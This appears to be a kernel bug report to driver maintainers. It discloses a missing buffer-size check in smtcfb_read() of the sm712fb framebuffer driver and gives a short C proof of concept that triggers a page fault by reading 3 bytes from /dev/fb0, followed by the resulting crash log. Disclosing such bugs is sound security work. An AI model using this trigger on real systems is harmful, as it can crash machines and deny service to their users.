I found a minor in the smtcfb_read() function of the driver sm712fb. This read function can not handle the case that the size of the buffer is 3 and does not check for it, which may cause a page fault. Here is a simple PoC: #include <endian.h> #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> int main(void) { char buf[10]; int fd = open("/dev/fb0", O_RDWR); read(fd, buf, 3); return 0; } The following log reveals it: [ 2432.614490] BUG: unable to handle page fault for address: ffffc90001ffffff [ 2432.618474] RIP: 0010:smtcfb_read+0x230/0x3e0 [ 2432.626551] Call Trace: [ 2432.626770] <TASK> [ 2432.626950] vfs_read+0x198/0xa00 [ 2432.627225] ? do_sys_openat2+0x27d/0x350 [ 2432.627552] ? __fget_light+0x54/0x340 [ 2432.627871] ksys_read+0xce/0x190 [ 2432.628143] do_syscall_64+0x43/0x90 Regards, Zheyu Ma